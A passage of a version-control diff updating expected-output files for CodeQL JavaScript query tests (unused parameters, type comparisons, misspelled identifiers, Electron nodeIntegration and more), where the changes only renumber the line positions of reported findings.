b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected @@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 73be1f62b893..a188fe34545d 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected @@ -3,7 +3,7 @@ | decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | -| externs.js:6:5:6:13 | iAmUnused | Unused variable iAmUnused. | +| externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | | importWithoutPragma.jsx:1:1:1:27 | import ... react'; | Unused import h. | | interTypes.ts:1:1:1:37 | import ... where"; | Unused import Bar. | | multi-imports.js:1:1:1:29 | import ... om 'x'; | Unused imports a, b, d. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..e94b40e1c1df 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected @@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // $ ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..1f4a398b2af4 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected @@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | | uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..12142d56507f 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected @@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:205:12:205:13 | t3 | variable 't3' | -| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' | -| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' | -| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' | -| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' | -| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression | -| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression | +| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' | +| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression | +| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression | +| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression | +| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:23:28:23:36 | undefined | 'undefined' | +| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' | +| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression | +| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression | +| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression | +| tst.js:79:31:79:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:79:38:79:41 | null | an expression | +| tst.js:82:35:82:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:82:42:82:45 | null | an expression | +| tst.js:92:5:92:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:92:12:92:15 | null | an expression | +| tst.js:95:9:95:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:95:16:95:19 | null | an expression | +| tst.js:101:5:101:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:101:9:101:13 | "def" | an expression | +| tst.js:108:5:108:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:108:9:108:13 | "def" | an expression | +| tst.js:122:5:122:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:122:13:122:14 | 42 | an expression | +| tst.js:125:5:125:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:125:13:125:17 | "bar" | an expression | +| tst.js:133:5:133:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:133:11:133:14 | "42" | an expression | +| tst.js:134:5:134:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:134:12:134:12 | b | variable 'b' | +| tst.js:135:5:135:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:135:11:135:11 | b | variable 'b' | +| tst.js:139:5:139:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:139:15:139:23 | undefined | 'undefined' | +| tst.js:140:5:140:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:140:19:140:23 | "foo" | an expression | +| tst.js:142:5:142:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:142:13:142:17 | "foo" | an expression | +| tst.js:144:5:144:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:144:18:144:22 | "foo" | an expression | +| tst.js:151:5:151:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:151:12:151:15 | null | an expression | +| tst.js:152:5:152:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:152:14:152:15 | t1 | variable 't1' | +| tst.js:155:5:155:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:155:12:155:15 | null | an expression | +| tst.js:156:5:156:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:156:14:156:15 | t2 | variable 't2' | +| tst.js:159:5:159:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:159:12:159:15 | null | an expression | +| tst.js:160:5:160:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:160:14:160:15 | t3 | variable 't3' | +| tst.js:163:5:163:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:163:12:163:15 | null | an expression | +| tst.js:164:5:164:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:164:14:164:15 | t4 | variable 't4' | +| tst.js:167:5:167:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:167:12:167:15 | null | an expression | +| tst.js:168:5:168:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:168:14:168:15 | t5 | variable 't5' | +| tst.js:171:5:171:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:171:12:171:15 | null | an expression | +| tst.js:172:5:172:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:172:14:172:15 | t6 | variable 't6' | +| tst.js:175:5:175:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:175:12:175:15 | null | an expression | +| tst.js:176:5:176:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:176:14:176:15 | t7 | variable 't7' | +| tst.js:179:5:179:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:179:12:179:15 | null | an expression | +| tst.js:180:5:180:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:180:14:180:15 | t8 | variable 't8' | +| tst.js:193:5:193:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:193:12:193:13 | t4 | variable 't4' | +| tst.js:194:5:194:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:194:12:194:13 | t2 | variable 't2' | +| tst.js:195:5:195:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:195:12:195:13 | t4 | variable 't4' | +| tst.js:196:5:196:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:196:12:196:13 | t3 | variable 't3' | +| tst.js:198:5:198:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:198:12:198:13 | t5 | variable 't5' | +| tst.js:199:5:199:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:199:12:199:13 | t2 | variable 't2' | +| tst.js:200:5:200:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:200:12:200:13 | t5 | variable 't5' | +| tst.js:201:5:201:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:201:12:201:13 | t3 | variable 't3' | +| tst.js:216:13:216:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:216:20:216:24 | "foo" | an expression | +| tst.js:224:5:224:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:224:11:224:12 | 42 | an expression | diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected index 3168aa8b1a0b..51a9ebb1f0a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected @@ -1,17 +1,17 @@ -| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. | -| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. | -| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. | -| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | -| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. | -| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. | -| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. | -| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. | -| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. | -| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. | -| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. | -| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. | +| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. | +| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. | +| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. | +| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | +| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. | +| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. | +| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. | +| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. | +| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. | +| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. | +| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. | +| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. | diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected index 1bf8599b8be5..05bc8f28ad14 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected @@ -1,6 +1,6 @@ -| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. | -| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | -| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | +| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. | +| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | +| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected index e97b3e8fe783..fcdf350a9268 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected @@ -1,5 +1,5 @@ | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. | | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. | -| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. | -| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. | -| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. | +| tst.js:4:2:4:14 | width = width | This expression assigns variable width to itself. | +| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. | +| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. | diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected index 990eaa36148f..1ce095b51938 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected @@ -2,5 +2,5 @@ | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. | | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. | | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. | -| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. | +| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. | | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. | diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected index 81cd1fac8fd5..82d959bca090 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. | | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. | -| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | +| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected index 6b028267ff76..4ed958a048a1 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected @@ -1,2 +1,2 @@ -| tst.js:6:15:6:15 | y | Parameter y is not documented. | -| tst.js:26:19:26:19 | y | Parameter y is not documented. | +| tst.js:4:15:4:15 | y | Parameter y is not documented. | +| tst.js:23:19:23:19 | y | Parameter y is not documented. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected index bffe622dc7e0..7be415438250 100644 --- 